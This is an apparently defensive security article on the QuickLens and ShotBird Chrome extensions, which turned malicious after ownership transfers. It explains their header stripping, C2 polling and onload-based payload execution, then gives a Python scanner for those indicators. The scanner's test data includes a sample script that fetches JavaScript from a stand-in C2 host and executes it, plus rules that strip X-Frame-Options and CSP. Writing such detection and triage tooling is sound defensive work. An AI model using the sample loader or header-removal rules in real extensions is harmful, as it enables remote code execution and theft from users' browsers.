A critical cybersecurity threat has emerged from the Chrome Web Store, where two seemingly legitimate browser extensions turned malicious following a transfer of ownership. This incident highlights a dangerous supply chain vulnerability within the browser extension ecosystem, where trusted software can be weaponized after being sold or handed off to a malicious actor. The extensions, QuickLens and ShotBird, were originally developed by an individual associated with the email "akshayanuonline@gmail.com" (BuildMeluon). While QuickLens has been removed from the store, ShotBird remained available at the time of reporting, posing an ongoing risk to users who installed it for its advertised function of creating professional visuals with local processing.
The path to compromise followed a clear pattern. According to research by monxresearch-sec, the ShotBird extension, which received a "Featured" flag from Google in January 2025, was transferred to a new developer ("loraprice198865@gmail.com") last month. Similarly, security researcher John Tuckner of Annex Security detailed that QuickLens was listed for sale on the marketplace ExtensionHub just two days after its initial publication in October 2025 by the original developer. By February 1, 2026, its Chrome Web Store listing showed ownership had changed to "support@doodlebuggle.top." These transfers provided the new, malicious owners with the ability to push updates to the existing user base.
The malicious update deployed to QuickLens on February 17, 2026, was particularly insidious. It maintained the extension's original functionality to avoid user suspicion while embedding powerful attack capabilities. The update introduced code to strip crucial security headers, such as `X-Frame-Options`, from every HTTP response. This action allows malicious scripts injected into a webpage to make arbitrary cross-domain requests, effectively bypassing fundamental web security protections like Content Security Policy (CSP). This creates a wide-open channel for further exploitation on any site the user visits.
Beyond header manipulation, the compromised extension executed a sophisticated data exfiltration and remote code execution routine. It contained code to fingerprint the user's environment, detecting their country, browser, and operating system. Most alarmingly, the extension was configured to poll an external command-and-control server every five minutes. It would fetch JavaScript payloads, store them in the browser's local storage, and ensure their execution on every subsequent page load. This was achieved by dynamically adding a hidden 1x1 pixel GIF image element to the page and setting the malicious JavaScript string as its `onload` attribute, a clever evasion technique. This mechanism grants attackers persistent, remote control over the victim's browser, enabling data theft, further malware deployment, and manipulation of web sessions.
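The two paragraphs above describe four behaviours a defender can look for when triaging an unpacked extension: broad header-modification permissions, rules that strip `X-Frame-Options`/CSP from responses, timed polling of a remote server whose result lands in `localStorage`, and an `onload` handler built from a string. The Python scanner below is an added example, not code from the researchers or the extensions; the manifest, rule set and content script it scans are constructed samples that mimic the reported behaviour, not the real QuickLens files.

```python
import json
import re

# Constructed sample of an unpacked extension (manifest, a declarativeNetRequest
# rule file and a content script). These imitate the reported behaviours only.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "permissions": ["declarativeNetRequest", "storage"],
    "host_permissions": ["<all_urls>"],
}
SAMPLE_RULES = json.dumps([{"id": 1, "action": {"type": "modifyHeaders",
    "responseHeaders": [{"header": "x-frame-options", "operation": "remove"},
                        {"header": "content-security-policy", "operation": "remove"}]},
    "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}}])
SAMPLE_SCRIPT = """
setInterval(function(){ fetch("https://c2.example.invalid/p").then(r=>r.text())
  .then(js=>localStorage.setItem("cfg", js)); }, 300000);
var img = document.createElement("img"); img.width = 1; img.height = 1;
img.src = "data:image/gif;base64,R0lGODlhAQABAAAAACw=";
img.setAttribute("onload", localStorage.getItem("cfg")); document.body.appendChild(img);
"""

SECURITY_HEADERS = ("x-frame-options", "content-security-policy")

def triage_extension(manifest, files):
    """Return a set of indicator names found. `files` maps filename -> file text."""
    findings = set()
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if perms & {"declarativeNetRequest", "webRequest", "webRequestBlocking"} and "<all_urls>" in perms:
        findings.add("broad_header_modification_permissions")
    for text in files.values():
        # A rule file or webRequest handler that names a security header and removes it.
        for hdr in SECURITY_HEADERS:
            if re.search(rf"[\"']{hdr}[\"']", text, re.I) and re.search(r"remove|responseHeaders", text, re.I):
                findings.add(f"strips_{hdr}")
        # A timer whose callback fetches remote content (the five-minute C2 polling pattern).
        if re.search(r"setInterval\s*\([^;]*?\bfetch\s*\(", text, re.S):
            findings.add("periodic_remote_fetch")
        # Fetched content written to localStorage, where it survives page loads.
        if re.search(r"localStorage\.setItem", text) and re.search(r"\bfetch\s*\(", text):
            findings.add("persists_remote_payload")
        # An onload handler assigned as a string attribute rather than a function.
        if re.search(r"setAttribute\(\s*[\"']onload[\"']\s*,", text):
            findings.add("dynamic_onload_handler")
    return findings
```

The heuristics are deliberately coarse: a hit means the file deserves manual review, not that the extension is malicious.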
This incident serves as a stark warning to both users and platform operators. It underscores that an extension's safety is not static but can degrade over time through ownership changes. Users must be exceedingly cautious, regularly reviewing their installed extensions and removing those that are non-essential. For Google and other browser vendors, this case emphasizes the urgent need for more rigorous vetting of ownership transfers and post-update behavioral analysis to detect when legitimate extensions are repurposed for malicious ends, protecting millions of users from such supply chain attacks.